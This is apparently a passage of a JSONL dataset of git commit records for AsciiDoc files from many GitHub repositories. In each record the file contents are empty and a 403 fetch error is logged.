openshift-tools,tiwillia\/openshift-tools,drewandersonnz\/openshift-tools,tiwillia\/openshift-tools,joelddiaz\/openshift-tools,twiest\/openshift-tools","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openshift\/openshift-tools.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac17156ad34df25971d89f597cbfb17d961dc81e","subject":"Initial commit","message":"Initial commit\n","repos":"ciarand\/dotfiles,ciarand\/dotfiles","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciarand\/dotfiles.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5ed46af08766ee57c615659c351427cd6559d65e","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46105d6c525c09021bafdd02364672f933fe52e5","subject":"add survey news item","message":"add survey news 
item\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2019\/01\/07\/clojure-2019-survey.adoc","new_file":"content\/news\/2019\/01\/07\/clojure-2019-survey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"125ab632dc08792c1cece7869feb0985e72c705b","subject":"Create index.adoc","message":"Create index.adoc","repos":"KostyaSha\/github-integration-plugin,KostyaSha\/github-integration-plugin,jenkinsci\/github-pullrequest-plugin,jenkinsci\/github-integration-plugin,KostyaSha\/github-integration-plugin,jenkinsci\/github-pullrequest-plugin,jenkinsci\/github-integration-plugin,KostyaSha\/github-integration-plugin,jenkinsci\/github-integration-plugin,jenkinsci\/github-pullrequest-plugin","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/github-integration-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff236f9d8011c6bc63c78690463d78e47b936a75","subject":"Convert user manual to ADOC format.","message":"Convert user manual to ADOC format.\n","repos":"jfitz\/BASIC-1965,jfitz\/BASIC-1965","old_file":"doc\/UserManual.adoc","new_file":"doc\/UserManual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfitz\/BASIC-1965.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a9fa6d0547ce420caca6a9c41baf2d1dc9b76e9","subject":"Update 2015-09-03-4511xposed.adoc","message":"Update 2015-09-03-4511xposed.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-03-4511xposed.adoc","new_file":"_posts\/2015-09-03-4511xposed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a6da43d3f485937a61e8c86fcc0a8a3519cfe41","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe424dd5d45ecd12ac520f516f35a2f742e5ff94","subject":"y2b create post MacBook Pro 2012 Review (15\\","message":"y2b create post MacBook Pro 2012 Review (15\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-06-25-MacBook-Pro-2012-Review-15.adoc","new_file":"_posts\/2012-06-25-MacBook-Pro-2012-Review-15.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ce8e5e612cbbfc45bc3680a5e87a5c1a7cfeb96","subject":"doc: remove 
cisco live from index","message":"doc: remove cisco live from index\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_index.asciidoc","new_file":"doc\/trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0233fc2586d31ab4ccc106739fa13147e4d5fc3c","subject":"Fix release notes formatting for multi-paragraph list items","message":"Fix release notes formatting for multi-paragraph list items\n\nIf a list item spans multiple paragraphs in AsciiDoc, it needs\na '+' in the intervening blank line, and the latter paragraphs\nshould not be indented on their first line. The text is a bit\nuglier, but it fixes the rendering.\n\nChange-Id: Ie65570ed32acef1c3025f351f7c4b4944f443f6e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4089\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n(cherry picked from commit ffd8fa4758fd8598a8d06a79249a6ab57d72aa81)\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4090\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b393fb26f60fe5b92ee26606f67e34cd96b7566","subject":"Added roundRobin load balancer EIP docs","message":"Added roundRobin load balancer EIP 
docs\n","repos":"rmarting\/camel,dmvolod\/camel,curso007\/camel,cunningt\/camel,DariusX\/camel,ullgren\/camel,onders86\/camel,Fabryprog\/camel,onders86\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,onders86\/camel,dmvolod\/camel,snurmine\/camel,jonmcewen\/camel,tadayosi\/camel,gautric\/camel,onders86\/camel,apache\/camel,CodeSmell\/camel,akhettar\/camel,ullgren\/camel,apache\/camel,alvinkwekel\/camel,pax95\/camel,jonmcewen\/camel,anoordover\/camel,gautric\/camel,gautric\/camel,akhettar\/camel,davidkarlsen\/camel,akhettar\/camel,pmoerenhout\/camel,objectiser\/camel,curso007\/camel,onders86\/camel,snurmine\/camel,kevinearls\/camel,sverkera\/camel,sverkera\/camel,gnodet\/camel,objectiser\/camel,christophd\/camel,pmoerenhout\/camel,CodeSmell\/camel,CodeSmell\/camel,tadayosi\/camel,davidkarlsen\/camel,zregvart\/camel,alvinkwekel\/camel,akhettar\/camel,akhettar\/camel,tdiesler\/camel,adessaigne\/camel,jamesnetherton\/camel,objectiser\/camel,gautric\/camel,tdiesler\/camel,anoordover\/camel,pmoerenhout\/camel,kevinearls\/camel,gautric\/camel,gnodet\/camel,nikhilvibhav\/camel,jonmcewen\/camel,tdiesler\/camel,nicolaferraro\/camel,gnodet\/camel,pax95\/camel,cunningt\/camel,dmvolod\/camel,kevinearls\/camel,anoordover\/camel,ullgren\/camel,rmarting\/camel,nicolaferraro\/camel,jamesnetherton\/camel,cunningt\/camel,punkhorn\/camel-upstream,pax95\/camel,mcollovati\/camel,cunningt\/camel,ullgren\/camel,davidkarlsen\/camel,jamesnetherton\/camel,Fabryprog\/camel,tadayosi\/camel,curso007\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,dmvolod\/camel,onders86\/camel,snurmine\/camel,kevinearls\/camel,zregvart\/camel,apache\/camel,gnodet\/camel,alvinkwekel\/camel,snurmine\/camel,nicolaferraro\/camel,DariusX\/camel,adessaigne\/camel,curso007\/camel,dmvolod\/camel,CodeSmell\/camel,gnodet\/camel,sverkera\/camel,anoordover\/camel,pmoerenhout\/camel,tdiesler\/camel,jamesnetherton\/camel,anoordover\/camel,kevinearls\/camel,christophd\/camel,curso007\/camel,christophd\/camel,davidkarlsen\/camel,pmoerenhout\/camel,christophd\/camel,nikhilvibhav\/camel,rmarting\/camel,alvinkwekel\/camel,pmoerenhout\/camel,DariusX\/camel,mcollovati\/camel,objectiser\/camel,adessaigne\/camel,tdiesler\/camel,mcollovati\/camel,zregvart\/camel,tadayosi\/camel,jonmcewen\/camel,jamesnetherton\/camel,cunningt\/camel,nicolaferraro\/camel,gautric\/camel,apache\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,pax95\/camel,christophd\/camel,pax95\/camel,rmarting\/camel,sverkera\/camel,pax95\/camel,adessaigne\/camel,cunningt\/camel,punkhorn\/camel-upstream,tdiesler\/camel,anoordover\/camel,adessaigne\/camel,zregvart\/camel,rmarting\/camel,Fabryprog\/camel,tadayosi\/camel,sverkera\/camel,kevinearls\/camel,snurmine\/camel,nikhilvibhav\/camel,jonmcewen\/camel,DariusX\/camel,mcollovati\/camel,apache\/camel,sverkera\/camel,dmvolod\/camel,akhettar\/camel,christophd\/camel,curso007\/camel,jamesnetherton\/camel,snurmine\/camel,rmarting\/camel,adessaigne\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/roundRobin-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/roundRobin-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"623c40ab882570b767d19213f2546c36c7021010","subject":"Update 2017-02-09-test1.adoc","message":"Update 
2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93b83c31de11c8aa375c3b4f3573eed3b6e0f9ed","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb72a1dbf26e1bfb810fe46b1a573bdb8a6944fe","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"215c5f292a9b954fa7ccfe3f29540875076ae1ae","subject":"[DOCS] Improve install and setup section for SQL JDBC","message":"[DOCS] Improve install and setup section for SQL JDBC\n","repos":"gfyoung\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"x-pack\/docs\/en\/sql\/endpoints\/jdbc.asciidoc","new_file":"x-pack\/docs\/en\/sql\/endpoints\/jdbc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85dab024fae752fec059469c716f3be417d35378","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 
2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3d8ca6e41e78c8bb97bc89323101f463853de62","subject":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","message":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4178c0ec3d4131b7cb2771287e942b36f6c032aa","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f8a72b1dea72dde1633f5696890d0b4f6785761","subject":"Update 2016-09-03-CME-New-Release-VPN.adoc","message":"Update 2016-09-03-CME-New-Release-VPN.adoc","repos":"mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io","old_file":"_posts\/2016-09-03-CME-New-Release-VPN.adoc","new_file":"_posts\/2016-09-03-CME-New-Release-VPN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattpearson\/mattpearson.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae79b7e70e37e20a0b97bc4220c142289c161ede","subject":"Update 2015-08-25-Uberkonsum.adoc","message":"Update 2015-08-25-Uberkonsum.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a22edce9ec3f45b056ab471fa7189e1b4a90895a","subject":"y2b create post PS4 vs Xbox One: The Full Story","message":"y2b create post PS4 vs Xbox One: The Full 
Story","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-12-PS4-vs-Xbox-One-The-Full-Story.adoc","new_file":"_posts\/2013-06-12-PS4-vs-Xbox-One-The-Full-Story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9baa2a08e12a8b918c22268f05fb564ad98c5ca8","subject":"add clojutre","message":"add clojutre\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojutre.adoc","new_file":"content\/events\/2016\/clojutre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"05141bfe3310cd5c23d9fb7989199862570cf0e8","subject":"y2b create post NEW OFFICE TOUR","message":"y2b create post NEW OFFICE TOUR","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-11-09-NEW-OFFICE-TOUR.adoc","new_file":"_posts\/2014-11-09-NEW-OFFICE-TOUR.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd20c52c00cfff54331c404fcf961ef036335cc3","subject":"Update 2016-09-18-Bionics-Cyborgs.adoc","message":"Update 2016-09-18-Bionics-Cyborgs.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-18-Bionics-Cyborgs.adoc","new_file":"_posts\/2016-09-18-Bionics-Cyborgs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"497161cbee0dabe0d12af5ca11a3f4f41468b5da","subject":"Update 2016-12-01-Exploit-sur-Tor.adoc","message":"Update 2016-12-01-Exploit-sur-Tor.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff1d263aa9e96c11525a1227fca039c1d5f8a7ab","subject":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","message":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bc02211b9f6d87dc10e7421490e64263d2750f5","subject":"Update 2016-09-10-Caught-In-The-Middle.adoc","message":"Update 
2016-09-10-Caught-In-The-Middle.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-09-10-Caught-In-The-Middle.adoc","new_file":"_posts\/2016-09-10-Caught-In-The-Middle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed5858ce12b346fece70151a2e05b8f960fa44ad","subject":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","message":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aafae908f4c98e7a5e35e04a208ebda4bdbc5c62","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"009dea0fe26f198fd203f2a88be38748acdff01c","subject":"Publish 2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","message":"Publish 2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","new_file":"2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4639e4316df7f8ddd83fc2df8922c1bd6a5107aa","subject":"y2b create post $8000 Robot Unboxing!","message":"y2b create post $8000 Robot Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-22-8000-Robot-Unboxing.adoc","new_file":"_posts\/2015-05-22-8000-Robot-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c650fb09be0115e485ed7d3adf481dc94790b4c","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 
2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11a6a16b7fdb6139e258ebcdccce236b143e77b8","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4a65cde2d6590b95675939f740b8c5138d4dad4","subject":"Create 2015-2-11-Just-a-Test.asciidoc","message":"Create 2015-2-11-Just-a-Test.asciidoc","repos":"rdmueller\/rdmueller.github.io,rdmueller\/rdmueller.github.io,rdmueller\/rdmueller.github.io","old_file":"_posts\/2015-2-11-Just-a-Test.asciidoc","new_file":"_posts\/2015-2-11-Just-a-Test.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdmueller\/rdmueller.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f22c47a47eef3cde872fb60ef4f9b61cc739e310","subject":"Update 2017-08-08-hello-hubpress.adoc","message":"Update 2017-08-08-hello-hubpress.adoc","repos":"adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press","old_file":"_posts\/2017-08-08-hello-hubpress.adoc","new_file":"_posts\/2017-08-08-hello-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adjiebpratama\/press.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97526a840bad7d44ba61c01d9d8f82d474a6df28","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"842e2fc28c427f15f51fdb58d18837bb1a901ad9","subject":"y2b create post ASTRO Gaming A50 Wireless Headset Unboxing (PS3, Xbox 360, PC Gaming Headset)","message":"y2b create post ASTRO Gaming A50 Wireless Headset Unboxing (PS3, Xbox 360, PC Gaming 
